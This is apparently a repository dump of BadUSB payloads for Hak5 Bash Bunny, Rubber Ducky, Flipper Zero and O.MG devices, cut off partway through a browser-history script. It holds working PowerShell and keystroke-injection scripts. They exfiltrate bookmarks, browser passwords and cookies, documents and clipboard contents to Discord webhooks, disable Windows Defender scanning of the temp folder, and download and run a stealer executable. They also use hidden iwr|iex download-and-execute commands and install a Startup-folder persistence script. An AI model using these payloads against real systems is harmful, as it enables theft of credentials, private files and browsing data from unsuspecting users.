Showing preview only (367K chars total). Download the full file or copy to clipboard to get everything.
Repository: atomiczsec/My-Payloads
Branch: main
Commit: 5f1da98a457a
Files: 224
Total size: 316.5 KB
Directory structure:
gitextract_2ly3q691/
├── Assets/
│ └── placeholder
├── BashBunny/
│ └── payloads/
│ ├── Bookmark-Hog/
│ │ ├── BBB.ps1
│ │ ├── README.md
│ │ ├── payload.txt
│ │ └── placeholder
│ ├── Browser-Grab/
│ │ ├── README.md
│ │ ├── b.ps1
│ │ └── payload.txt
│ ├── Copy-And-Waste/
│ │ ├── I.bat
│ │ ├── README.md
│ │ ├── c.ps1
│ │ ├── payload.txt
│ │ └── placeholder
│ ├── De-Bloater/
│ │ ├── README.md
│ │ └── payload.txt
│ ├── Doc-Hog/
│ │ ├── d.ps1
│ │ ├── payload.txt
│ │ └── readme.md
│ ├── History-Pig/
│ │ ├── HP.ps1
│ │ ├── README.md
│ │ └── payload.txt
│ ├── OVPN-Hog/
│ │ ├── o.ps1
│ │ ├── payload.txt
│ │ └── readme.md
│ ├── Powershell-History/
│ │ ├── PH.ps1
│ │ ├── README.md
│ │ └── payload.txt
│ ├── Printer-Recon/
│ │ ├── PR.ps1
│ │ ├── README.md
│ │ └── payload.txt
│ ├── Priv-Paths/
│ │ ├── README.md
│ │ └── payload.txt
│ ├── Proton-Hog/
│ │ ├── README.md
│ │ ├── payload.txt
│ │ └── s.ps1
│ ├── Pwn-Drive/
│ │ ├── README.md
│ │ ├── c.ps1
│ │ └── payload.txt
│ ├── RanFunWare/
│ │ ├── README.md
│ │ ├── payload.txt
│ │ └── r.ps1
│ ├── Screen-Shock/
│ │ ├── I.bat
│ │ ├── README.md
│ │ ├── c.ps1
│ │ ├── payload.txt
│ │ └── placeholder
│ ├── Spotify-Spy/
│ │ ├── README.md
│ │ ├── SS.ps1
│ │ └── payload.txt
│ ├── Water-UnMark/
│ │ ├── README.md
│ │ ├── payload.txt
│ │ └── placeholder
│ ├── cApS-Troll/
│ │ ├── README.md
│ │ ├── a.ps1
│ │ └── payload.txt
│ └── placeholder
├── FlipperZero/
│ └── payloads/
│ ├── Bookmark-Hog/
│ │ ├── BH.ps1
│ │ ├── README.md
│ │ └── payload.txt
│ ├── Browser-Devil/
│ │ └── Browser-Devil/
│ │ ├── README.md
│ │ ├── b.ps1
│ │ └── payload.txt
│ ├── Copy-And-Waste/
│ │ ├── I.bat
│ │ ├── README.md
│ │ ├── c.ps1
│ │ ├── payload.txt
│ │ └── placeholder
│ ├── De-Bloater/
│ │ ├── README.md
│ │ ├── payload.txt
│ │ └── placeholder
│ ├── Doc-Hog/
│ │ ├── d.ps1
│ │ ├── payload.txt
│ │ └── readme.md
│ ├── History-Pig/
│ │ ├── HP.ps1
│ │ ├── README.md
│ │ └── payload.txt
│ ├── OVPN-Hog/
│ │ ├── o.ps1
│ │ ├── payload.txt
│ │ └── readme.md
│ ├── Powershell-History/
│ │ ├── PH.ps1
│ │ ├── README.md
│ │ └── payload.txt
│ ├── Printer-Recon/
│ │ ├── PR.ps1
│ │ ├── README.md
│ │ └── payload.txt
│ ├── Priv-Paths/
│ │ ├── README.md
│ │ └── payload.txt
│ ├── Proton-Hog/
│ │ ├── README.md
│ │ ├── payload.txt
│ │ └── s.ps1
│ ├── Pwn-Drive/
│ │ ├── README.md
│ │ ├── c.ps1
│ │ └── payload.txt
│ ├── RanFunWare/
│ │ ├── README.md
│ │ ├── payload.txt
│ │ └── r.ps1
│ ├── Screen-Shock/
│ │ ├── I.bat
│ │ ├── README.md
│ │ ├── c.ps1
│ │ ├── payload.txt
│ │ └── placeholder
│ ├── Spotify-Spy/
│ │ ├── README.md
│ │ ├── SS.ps1
│ │ └── payload.txt
│ ├── Water-UnMark/
│ │ ├── README.md
│ │ ├── payload.txt
│ │ └── placeholder
│ └── cApS-Troll/
│ ├── README.md
│ ├── a.ps1
│ └── payload.txt
├── Functions/
│ ├── placeholder
│ └── tidal-log.ps1
├── OMG/
│ └── payloads/
│ ├── Bookmark-Hog/
│ │ ├── BH.ps1
│ │ ├── README.md
│ │ ├── payload.txt
│ │ └── placeholder
│ ├── Browser-Grab/
│ │ ├── README.md
│ │ ├── b.ps1
│ │ └── payload.txt
│ ├── Copy-And-Waste/
│ │ ├── I.bat
│ │ ├── README.md
│ │ ├── c.ps1
│ │ ├── payload.txt
│ │ └── placeholder
│ ├── De-Bloater/
│ │ ├── README.md
│ │ └── payload.txt
│ ├── Doc-Hog/
│ │ ├── d.ps1
│ │ ├── payload.txt
│ │ └── readme.md
│ ├── History-Pig/
│ │ ├── HP.ps1
│ │ ├── README.md
│ │ └── payload.txt
│ ├── OVPN-Hog/
│ │ ├── o.ps1
│ │ ├── payload.txt
│ │ └── readme.md
│ ├── Powershell-History/
│ │ ├── PH.ps1
│ │ ├── README.md
│ │ └── payload.txt
│ ├── Printer-Recon/
│ │ ├── PR.ps1
│ │ ├── README.md
│ │ └── payload.txt
│ ├── Priv-Paths/
│ │ ├── README.md
│ │ └── payload.txt
│ ├── Proton-Hog/
│ │ ├── README.md
│ │ ├── payload.txt
│ │ └── s.ps1
│ ├── Pwn-Drive/
│ │ ├── README.md
│ │ ├── c.ps1
│ │ └── payload.txt
│ ├── RanFunWare/
│ │ ├── README.md
│ │ ├── payload.txt
│ │ └── r.ps1
│ ├── Screen-Shock/
│ │ ├── I.bat
│ │ ├── README.md
│ │ ├── c.ps1
│ │ ├── payload.txt
│ │ └── placeholder
│ ├── Spotify-Spy/
│ │ ├── README.md
│ │ ├── SS.ps1
│ │ └── payload.txt
│ ├── Water-UnMark/
│ │ ├── README.md
│ │ ├── payload.txt
│ │ └── placeholder
│ ├── cApS-Troll/
│ │ ├── README.md
│ │ ├── a.ps1
│ │ └── payload.txt
│ └── placeholder
├── README.md
└── RubberDucky/
└── payloads/
├── Bookmark-Hog/
│ ├── BH.ps1
│ ├── README.md
│ └── payload.txt
├── Browser-Grab/
│ ├── README.md
│ ├── b.ps1
│ └── payload.txt
├── Copy-And-Waste/
│ ├── I.bat
│ ├── README.md
│ ├── c.ps1
│ ├── payload.txt
│ └── placeholder
├── De-Bloater/
│ ├── README.md
│ └── payload.txt
├── Doc-Hog/
│ ├── d.ps1
│ ├── payload.txt
│ └── readme.md
├── History-Pig/
│ ├── HP.ps1
│ ├── README.md
│ └── payload.txt
├── OVPN-Hog/
│ ├── o.ps1
│ ├── payload.txt
│ └── readme.md
├── Picture-Hog/
│ ├── p.ps1
│ └── placeholder
├── Powershell-History/
│ ├── PH.ps1
│ ├── README.md
│ └── payload.txt
├── Printer-Recon/
│ ├── PR.ps1
│ ├── README.md
│ └── payload.txt
├── Priv-Paths/
│ ├── README.md
│ └── payload.txt
├── Proton-Hog/
│ ├── README.md
│ ├── payload.txt
│ └── s.ps1
├── Pwn-Drive/
│ ├── README.md
│ ├── c.ps1
│ └── payload.txt
├── RanFunWare/
│ ├── README.md
│ ├── payload.txt
│ └── r.ps1
├── Screen-Shock/
│ ├── I.bat
│ ├── README.md
│ ├── c.ps1
│ ├── payload.txt
│ └── placeholder
├── Spotify-Spy/
│ ├── README.md
│ ├── SS.ps1
│ └── payload.txt
├── Water-UnMark/
│ ├── README.md
│ ├── payload.txt
│ └── placeholder
├── cApS-Troll/
│ ├── README.md
│ ├── a.ps1
│ └── payload.txt
└── placeholder
================================================
FILE CONTENTS
================================================
================================================
FILE: Assets/placeholder
================================================
================================================
FILE: BashBunny/payloads/Bookmark-Hog/BBB.ps1
================================================
#Bookmark-Hog
# Get Drive Letter
$bb = (gwmi win32_volume -f 'label=''BashBunny''').Name
# Test if directory exists if not create directory in loot folder to store file
$TARGETDIR = "$bb\loot\Bookmark-Hog\$env:computername\Chromebm.txt"
$TARGETDIR2 = "$bb\loot\Bookmark-Hog\$env:computername\Edgebm.txt"
if(!(Test-Path -Path $TARGETDIR )){
mkdir $TARGETDIR
}
# See if file is a thing
Test-Path -Path "$env:USERPROFILE/AppData/Local/Google/Chrome/User Data/Default/Bookmarks" -PathType Leaf
#If the file does not exist, write to host.
if (-not(Test-Path -Path "$env:USERPROFILE/AppData/Local/Google/Chrome/User Data/Default/Bookmarks" -PathType Leaf)) {
try {
Write-Host "The chrome bookmark file has not been found. "
}
catch {
throw $_.Exception.Message
}
}
# Copy Chrome Bookmarks to Bash Bunny
else {
Copy-Item "$env:USERPROFILE/AppData/Local/Google/Chrome/User Data/Default/Bookmarks" -Destination "$TARGETDIR"
}
# See if file is a thing
Copy-Item "$env:USERPROFILE/AppData/Local/Microsoft/Edge/User Data/Default/Bookmarks" -Destination "$TARGETDIR2"
#If the file does not exist, write to host.
if (-not(Test-Path -Path "$env:USERPROFILE/AppData/Local/Microsoft/Edge/User Data/Default/Bookmarks" -PathType Leaf)) {
try {
Write-Host "The edge bookmark file has not been found. "
}
catch {
throw $_.Exception.Message
}
}
# Copy Chrome Bookmarks to Bash Bunny
else {
Copy-Item "$env:USERPROFILE/AppData/Local/Microsoft/Edge/User Data/Default/Bookmarks" -Destination "$TARGETDIR2"
}
================================================
FILE: BashBunny/payloads/Bookmark-Hog/README.md
================================================
<img src="https://github.com/atomiczsec/My-Payloads/blob/main/Assets/bm-hog.png?" width="200">
<h1 align="center">
<a href="https://git.io/typing-svg">
<img src="https://readme-typing-svg.herokuapp.com/?lines=Welcome+to+the;Bookmark+Hog!+😈¢er=true&size=30">
</a>
</h1>
<!-- TABLE OF CONTENTS -->
<details>
<summary>Table of Contents</summary>
<ol>
<li><a href="#Description">Description</a></li>
<li><a href="#getting-started">Getting Started</a></li>
<li><a href="#Contributing">Contributing</a></li>
<li><a href="#Version-History">Version History</a></li>
<li><a href="#Contact">Contact</a></li>
<li><a href="#Acknowledgments">Acknowledgments</a></li>
</ol>
</details>
# Bookmark-Hog
A payload to exfiltrate bookmarks of the 2 most popular browsers
## Description
This payload will enumerate through the browser directories, looking for the file that stores the bookmark history
These files will be saved to the bash bunny in the loot directory
## Getting Started
### Dependencies
* Windows 10,11
<p align="right">(<a href="#top">back to top</a>)</p>
### Executing program
* Plug in your device
* Let the magic happen
<p align="right">(<a href="#top">back to top</a>)</p>
## Contributing
All contributors names will be listed here
atomiczsec
I am Jakoby
<p align="right">(<a href="#top">back to top</a>)</p>
## Version History
* 0.1
* Initial Release
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- CONTACT -->
## Contact
<h2 align="center">📱 My Socials 📱</h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://www.youtube.com/channel/UC-7iJTFN8-CsTTuXd3Va6mA?sub_confirmation=1">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/youtube-svgrepo-com.svg width="48" height="48" alt="C#" />
</a>
<br>YouTube
</td>
<td align="center" width="96">
<a href="https://twitter.com/atomiczsec">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/twitter.png width="48" height="48" alt="Python" />
</a>
<br>Twitter
</td>
<td align="center" width="96">
<a href="https://discord.gg/MYYER2ZcJF">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/discord-v2-svgrepo-com.svg width="48" height="48" alt="Jsonnet" />
</a>
<br>I-Am-Jakoby's Discord
</td>
</tr>
</table>
</div>
<p align="right">(<a href="#top">back to top</a>)</p>
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- ACKNOWLEDGMENTS -->
## Acknowledgments
* [Hak5](https://hak5.org/)
* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)
<p align="right">(<a href="#top">back to top</a>)</p>
================================================
FILE: BashBunny/payloads/Bookmark-Hog/payload.txt
================================================
# Title: Bookmark-Hog
# Description: This payload is meant to exfiltrate bookmarks to the bash bunny.
# Author: atomiczsec
# Version: 1.0
# Category: Exfiltration
# Attackmodes: HID, Storage
# Target: Windows 10, 11
LED SETUP
GET SWITCH_POSITION
ATTACKMODE HID STORAGE
LED STAGE1
QUACK DELAY 3000
QUACK GUI r
QUACK DELAY 100
LED STAGE2
QUACK STRING powershell -NoP -NonI -W Hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\BBB.ps1')"
QUACK ENTER
================================================
FILE: BashBunny/payloads/Bookmark-Hog/placeholder
================================================
================================================
FILE: BashBunny/payloads/Browser-Grab/README.md
================================================
<h1 align="center">
<a href="https://git.io/typing-svg">
<img src="https://readme-typing-svg.herokuapp.com/?lines=Welcome+to+the;Browser+Grab!+😈¢er=true&size=30">
</a>
</h1>
<!-- TABLE OF CONTENTS -->
<details>
<summary>Table of Contents</summary>
<ol>
<li><a href="#Description">Description</a></li>
<li><a href="#getting-started">Getting Started</a></li>
<li><a href="#Contributing">Contributing</a></li>
<li><a href="#Version-History">Version History</a></li>
<li><a href="#Contact">Contact</a></li>
<li><a href="#Acknowledgments">Acknowledgments</a></li>
</ol>
</details>
# Browser-Grab
A payload to exfiltrate bookmarks, passwords, history and cookies of most popular browsers
## Description
This payload will exclude the C: drive on the device so Windows Defender doesnt flag the exe
This payload will then download an exe designed to exfiltrate bookmarks, passwords, history and cookies of most popular browsers
Finally, discord will be used to exfiltrate the files to cloud storage
## Getting Started
### Dependencies
* DropBox or other file sharing service - Your Shared link for the intended file
* Admin privileges on the Device you are targeting
* Windows 10,11
<p align="right">(<a href="#top">back to top</a>)</p>
### Executing program
* Plug in your device
* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory
```
powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl
```
<p align="right">(<a href="#top">back to top</a>)</p>
## Contributing
All contributors names will be listed here
atomiczsec
I am Jakoby
<p align="right">(<a href="#top">back to top</a>)</p>
## Version History
* 0.1
* Initial Release
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- CONTACT -->
## Contact
<h2 align="center">📱 My Socials 📱</h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://www.youtube.com/channel/UC-7iJTFN8-CsTTuXd3Va6mA?sub_confirmation=1">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/youtube-svgrepo-com.svg width="48" height="48" alt="C#" />
</a>
<br>YouTube
</td>
<td align="center" width="96">
<a href="https://twitter.com/atomiczsec">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/twitter.png width="48" height="48" alt="Python" />
</a>
<br>Twitter
</td>
<td align="center" width="96">
<a href="https://discord.gg/MYYER2ZcJF">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/discord-v2-svgrepo-com.svg width="48" height="48" alt="Jsonnet" />
</a>
<br>I-Am-Jakoby's Discord
</td>
</tr>
</table>
</div>
<p align="right">(<a href="#top">back to top</a>)</p>
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- ACKNOWLEDGMENTS -->
## Acknowledgments
* [Hak5](https://hak5.org/)
* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)
<p align="right">(<a href="#top">back to top</a>)</p>
================================================
FILE: BashBunny/payloads/Browser-Grab/b.ps1
================================================
function Upload-Discord {
[CmdletBinding()]
param (
[parameter(Position=0,Mandatory=$False)]
[string]$file,
[parameter(Position=1,Mandatory=$False)]
[string]$text
)
$hookurl = 'YOUR-DISCORD-WEBHOOK'
$Body = @{
'username' = $env:username
'content' = $text
}
if (-not ([string]::IsNullOrEmpty($text))){
Invoke-RestMethod -ContentType 'Application/Json' -Uri $hookurl -Method Post -Body ($Body | ConvertTo-Json)};
if (-not ([string]::IsNullOrEmpty($file))){curl.exe -F "file1=@$file" $hookurl}
}
# Add $env:tmp to exlusions so Windows Defender doesnt flag the exe we will download
Add-MpPreference -ExclusionPath $env:tmp
# Download the exe and save it to temp directory
iwr "https://github.com/atomiczsec/My-Payloads/blob/main/Assets/browser.exe?raw=true" -outfile "$env:tmp\browser.exe"
# Execute the Browser Stealer
cd $env:tmp;Start-Process -FilePath "$env:tmp\browser.exe" -WindowStyle h -Wait
# Exfiltrate the loot to discord
Compress-Archive -Path "$env:tmp\results" -DestinationPath $env:tmp\browserdata.zip
Upload-Discord -file "$env:tmp\browserdata.zip"
================================================
FILE: BashBunny/payloads/Browser-Grab/payload.txt
================================================
REM Title: Browser-Grab
REM Author: atomiczsec
REM Description: A payload to exfiltrate bookmarks, passwords, history and cookies of most popular browsers
REM Target: Windows 10
Q DELAY 2000
Q GUI r
Q DELAY 1000
Q STRING powershell start-process powershell -verb runas
Q ENTER
Q DELAY 1000
Q ALT y
Q DELAY 1000
Q STRING iwr https:// < Your Shared link for the intended file> ?dl=1 | iex
Q ENTER
REM Remember to replace the link with your DropBox shared link for the intended file to download
REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properly
================================================
FILE: BashBunny/payloads/Copy-And-Waste/I.bat
================================================
@echo off
powershell -Command "& {cd "$env:userprofile\AppData\Roaming"; powershell -w h -NoP -NonI -Ep Bypass -File "c.ps1"}"
pause
================================================
FILE: BashBunny/payloads/Copy-And-Waste/README.md
================================================
<img src="https://github.com/atomiczsec/My-Payloads/blob/main/Assets/caw.png" width="200">
<h1 align="center">
<a href="https://git.io/typing-svg">
<img src="https://readme-typing-svg.herokuapp.com/?lines=Welcome+to+;Copy+And+Waste!+😈¢er=true&size=30">
</a>
</h1>
<!-- TABLE OF CONTENTS -->
<details>
<summary>Table of Contents</summary>
<ol>
<li><a href="#Description">Description</a></li>
<li><a href="#getting-started">Getting Started</a></li>
<li><a href="#Contributing">Contributing</a></li>
<li><a href="#Version-History">Version History</a></li>
<li><a href="#Contact">Contact</a></li>
<li><a href="#Acknowledgments">Acknowledgments</a></li>
</ol>
</details>
# Copy-And-Waste
A payload to exfiltrate clipboard contents
## Description
This payload uses iwr to download 2 files
* I.bat
* c.ps1
**I.bat** is downloaded to the startup folder to maintain persistance and execute c.ps1 on reboot/startup
**c.ps1** will sit in AppData\Roaming folder, waiting for a Ctrl + C or Ctrl + X click
Then the contents will then be sent to the discord webhook for viewing pleasure
For killing the script press both Ctrl buttons at the same time [It will resume at reboot]
## Getting Started
### Dependencies
* Pastebin or other file sharing service, Discord webhook or other webhook service
* Windows 10,11
* [Here](https://support.discord.com/hc/en-us/articles/228383668-Intro-to-Webhooks) is a tutorial on how to use Discord webhooks
<p align="right">(<a href="#top">back to top</a>)</p>
### Executing program
* Plug in your device
* Device will download both files and place them in proper directories to then run the script
```
powershell -w h -NoP -NonI -Ep Bypass "echo (iwr PASTEBIN LINK FOR BAT).content > "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\l.bat";echo (iwr PASTEBIN LINK FOR PS1).content > "$env:APPDATA\c.ps1";powershell "$env:APPDATA\c.ps1""
```
<p align="right">(<a href="#top">back to top</a>)</p>
## Contributing
All contributors names will be listed here:
[atomiczsec](https://github.com/atomiczsec) &
[I-Am-Jakoby](https://github.com/I-Am-Jakoby)
<p align="right">(<a href="#top">back to top</a>)</p>
## Version History
* 0.1
* Initial Release
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- CONTACT -->
## Contact
<h2 align="center">📱 My Socials 📱</h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://www.youtube.com/channel/UC-7iJTFN8-CsTTuXd3Va6mA?sub_confirmation=1">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/youtube-svgrepo-com.svg width="48" height="48" alt="C#" />
</a>
<br>YouTube
</td>
<td align="center" width="96">
<a href="https://twitter.com/atomiczsec">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/twitter.png width="48" height="48" alt="Python" />
</a>
<br>Twitter
</td>
<td align="center" width="96">
<a href="https://discord.gg/MYYER2ZcJF">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/discord-v2-svgrepo-com.svg width="48" height="48" alt="Jsonnet" />
</a>
<br>I-Am-Jakoby's Discord
</td>
</tr>
</table>
</div>
<p align="right">(<a href="#top">back to top</a>)</p>
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- ACKNOWLEDGMENTS -->
## Acknowledgments
* [Hak5](https://hak5.org/)
* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)
<p align="right">(<a href="#top">back to top</a>)</p>
================================================
FILE: BashBunny/payloads/Copy-And-Waste/c.ps1
================================================
Add-Type -AssemblyName WindowsBase
Add-Type -AssemblyName PresentationCore
function dischat {
[CmdletBinding()]
param (
[Parameter (Position=0,Mandatory = $True)]
[string]$con
)
$hookUrl = 'YOUR DISCORD WEBHOOK'
$Body = @{
'username' = $env:username
'content' = $con
}
Invoke-RestMethod -Uri $hookUrl -Method 'post' -Body $Body
}
dischat (get-clipboard)
while (1){
$Lctrl = [Windows.Input.Keyboard]::IsKeyDown([System.Windows.Input.Key]::'LeftCtrl')
$Rctrl = [Windows.Input.Keyboard]::IsKeyDown([System.Windows.Input.Key]::RightCtrl)
$cKey = [Windows.Input.Keyboard]::IsKeyDown([System.Windows.Input.Key]::c)
$xKey = [Windows.Input.Keyboard]::IsKeyDown([System.Windows.Input.Key]::x)
if (($Lctrl -or $Rctrl) -and ($xKey -or $cKey)) {dischat (Get-Clipboard)}
elseif ($Rctrl -and $Lctrl) {dischat "---------connection lost----------";exit}
else {continue}
}
================================================
FILE: BashBunny/payloads/Copy-And-Waste/payload.txt
================================================
REM Title: Copy-And-Waste
REM Author: atomiczsec & I am Jakoby
REM Description: This payload is meant to exfiltrate whatever is copied to the clipboard and sends to a discord webhook
REM Target: Windows 10, 11
DELAY 2000
GUI
DELAY
STRING powershell -w h -NoP -NonI -Ep Bypass "echo (iwr PASTEBIN LINK FOR BAT).content > "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\l.bat";echo (iwr PASTEBIN LINK FOR PS1).content > "$env:APPDATA\c.ps1";powershell "$env:APPDATA\c.ps1""
ENTER
REM Remember to replace the link with your pastebin shared link for the intended files to download
REM Also remember to put in your discord webhook in c.ps1
REM For the PASTEBIN LINK's do not put https:// infront of it, it should look like pastebin.com/raw/BLAHBLAHBLAH
================================================
FILE: BashBunny/payloads/Copy-And-Waste/placeholder
================================================
================================================
FILE: BashBunny/payloads/De-Bloater/README.md
================================================
<h1 align="center">
<a href="https://git.io/typing-svg">
<img src="https://readme-typing-svg.herokuapp.com/?lines=Welcome+to+;De-Bloater!+😈¢er=true&size=30">
</a>
</h1>
<!-- TABLE OF CONTENTS -->
<details>
<summary>Table of Contents</summary>
<ol>
<li><a href="#Description">Description</a></li>
<li><a href="#getting-started">Getting Started</a></li>
<li><a href="#Contributing">Contributing</a></li>
<li><a href="#Version-History">Version History</a></li>
<li><a href="#Contact">Contact</a></li>
<li><a href="#Acknowledgments">Acknowledgments</a></li>
</ol>
</details>
# De-Bloater
A payload to quickly get "Windows10Debloater"
## Description
This script will download "Windows10Debloater" - Script/Utility/Application to debloat Windows 10, to remove Windows pre-installed unnecessary applications, stop some telemetry functions, stop Cortana from being used as your Search Index, disable unnecessary scheduled tasks, and more...
## Getting Started
### Dependencies
* Windows 10
<p align="right">(<a href="#top">back to top</a>)</p>
### Executing program
* Plug in your device
```
iwr -useb https://git.io/debloat|iex
```
<p align="right">(<a href="#top">back to top</a>)</p>
## Contributing
All contributors names will be listed here:
[atomiczsec](https://github.com/atomiczsec)
[Sycnex](https://github.com/Sycnex/Windows10Debloater)
[I am Jakoby](https://github.com/I-Am-Jakoby/Powershell-to-Ducky-Converter)
<p align="right">(<a href="#top">back to top</a>)</p>
## Version History
* 0.1
* Initial Release
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- CONTACT -->
## Contact
<h2 align="center">📱 My Socials 📱</h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://www.youtube.com/channel/UC-7iJTFN8-CsTTuXd3Va6mA?sub_confirmation=1">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/youtube-svgrepo-com.svg width="48" height="48" alt="C#" />
</a>
<br>YouTube
</td>
<td align="center" width="96">
<a href="https://twitter.com/atomiczsec">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/twitter.png width="48" height="48" alt="Python" />
</a>
<br>Twitter
</td>
<td align="center" width="96">
<a href="https://discord.gg/MYYER2ZcJF">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/discord-v2-svgrepo-com.svg width="48" height="48" alt="Jsonnet" />
</a>
<br>I-Am-Jakoby's Discord
</td>
</tr>
</table>
</div>
<p align="right">(<a href="#top">back to top</a>)</p>
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- ACKNOWLEDGMENTS -->
## Acknowledgments
* [Hak5](https://hak5.org/)
* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)
* [Sycnex - Creator Of The Tool](https://github.com/Sycnex/Windows10Debloater)
<p align="right">(<a href="#top">back to top</a>)</p>
================================================
FILE: BashBunny/payloads/Doc-Hog/d.ps1
================================================
function Doc-Hog {
[CmdletBinding()]
param (
[parameter(Position=0,Mandatory=$False)]
[string]$file,
[parameter(Position=1,Mandatory=$False)]
[string]$text
)
$hookurl = 'DISCORD-WEBHOOK'
$Body = @{
'username' = $env:username
'content' = $text
}
if (-not ([string]::IsNullOrEmpty($text))) {
Invoke-RestMethod -ContentType 'Application/Json' -Uri $hookurl -Method Post -Body ($Body | ConvertTo-Json)
}
if (-not ([string]::IsNullOrEmpty($file))) {
curl.exe -F "file1=@$file" $hookurl
}
}
$Files = Get-ChildItem -Path "$env:HOMEPATH" -Include "*.docx","*.doc","*.pptx","*.xlsx","*.pdf","*.jpeg","*.png","*.jpg","*.csv","*.txt" -Recurse
$types = @{
"*.docx" = "Word";
"*.doc" = "Word";
"*.pptx" = "PowerPoint";
"*.xlsx" = "Excel";
"*.pdf" = "PDF";
"*.jpeg" = "JPEG";
"*.png" = "PNG";
"*.jpg" = "JPEG";
"*.csv" = "CSV";
"*.txt" = "Text";
}
foreach ($type in $types.Keys) {
$filteredFiles = $Files | Where-Object {$_.Name -like $type}
if ($filteredFiles) {
$zipFile = "$env:TEMP\$($types[$type]).zip"
$filteredFiles | Compress-Archive -DestinationPath $zipFile
Doc-Hog -file $zipFile -text "Uploading $($types[$type]) files"
}
}
================================================
FILE: BashBunny/payloads/Doc-Hog/payload.txt
================================================
REM Title: Doc-Hog
REM Author: atomiczsec
REM Description: This payload will enumerate through the files. Then create ZIPs with them, then send to a discord webhook.
DEFINE URL http://new-url.com/powershell.ps1
REM Target: Windows 10
QUACK DELAY 2000
QUACK GUI r
QUACK DELAY 500
QUACK STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr $URL dl=1; iex $pl
QUACK ENTER
REM Remember to replace the link with your DropBox shared link for the intended file to download
REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1
================================================
FILE: BashBunny/payloads/Doc-Hog/readme.md
================================================
<h1 align="center">
<a href="https://git.io/typing-svg">
<img src="https://readme-typing-svg.herokuapp.com/?lines=Welcome+to+the;Doc+Hog!+😈¢er=true&size=30">
</a>
</h1>
<!-- TABLE OF CONTENTS -->
<details>
<summary>Table of Contents</summary>
<ol>
<li><a href="#Description">Description</a></li>
<li><a href="#getting-started">Getting Started</a></li>
<li><a href="#Contributing">Contributing</a></li>
<li><a href="#Version-History">Version History</a></li>
<li><a href="#Contact">Contact</a></li>
<li><a href="#Acknowledgments">Acknowledgments</a></li>
</ol>
</details>
# Doc-Hog
A payload to exfiltrate all files like, PNG, DOCX, PDF, TXT, Excel, JPEG, and CSV
## Description
This payload will enumerate through the files. Then create ZIPs with them, then send to a discord webhook.
## Getting Started
### Dependencies
* DropBox or other file sharing service - Your Shared link for the intended file
* Windows 10,11
<p align="right">(<a href="#top">back to top</a>)</p>
### Executing program
* Plug in your device
* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory
```
powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl
```
<p align="right">(<a href="#top">back to top</a>)</p>
## Contributing
All contributors names will be listed here
atomiczsec
I am Jakoby
<p align="right">(<a href="#top">back to top</a>)</p>
## Version History
* 0.1
* Initial Release
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- CONTACT -->
## Contact
<div align="center">
<a href="https://lnk.bio/atomiczsec">
<img src="https://github.com/atomiczsec/My-Payloads/blob/main/Assets/sharethis-social-media-svgrepo-com.svg" width="48" height="48" alt="Link" />
</a>
</div>
<p align="right">(<a href="#top">back to top</a>)</p>
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- ACKNOWLEDGMENTS -->
## Acknowledgments
* [Hak5](https://hak5.org/)
* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)
<p align="right">(<a href="#top">back to top</a>)</p>
================================================
FILE: BashBunny/payloads/History-Pig/HP.ps1
================================================
#History-Pig
# See if file is a thing
Test-Path -Path "$env:USERPROFILE\AppData\Local\Google\Chrome\User Data\Default\History" -PathType Leaf
#If the file does not exist, write to host.
if (-not(Test-Path -Path "$env:USERPROFILE/AppData/Local/Google/Chrome/User Data/Default/History" -PathType Leaf)) {
try {
Write-Host "The Chrome History file has not been found. "
}
catch {
throw $_.Exception.Message
}
}
# Copy Chrome History to Temp Directory to get sent to Dropbox
else {
$F1 = "$env:USERNAME-$(get-date -f yyyy-MM-dd_hh-mm)_chrome_history"
Copy-Item "$env:USERPROFILE/AppData/Local/Google/Chrome/User Data/Default/History" -Destination "$env:tmp/$F1"
}
# See if file is a thing
Test-Path -Path "$env:USERPROFILE/AppData/Local/Microsoft/Edge/User Data/Default/History" -PathType Leaf
#If the file does not exist, write to host.
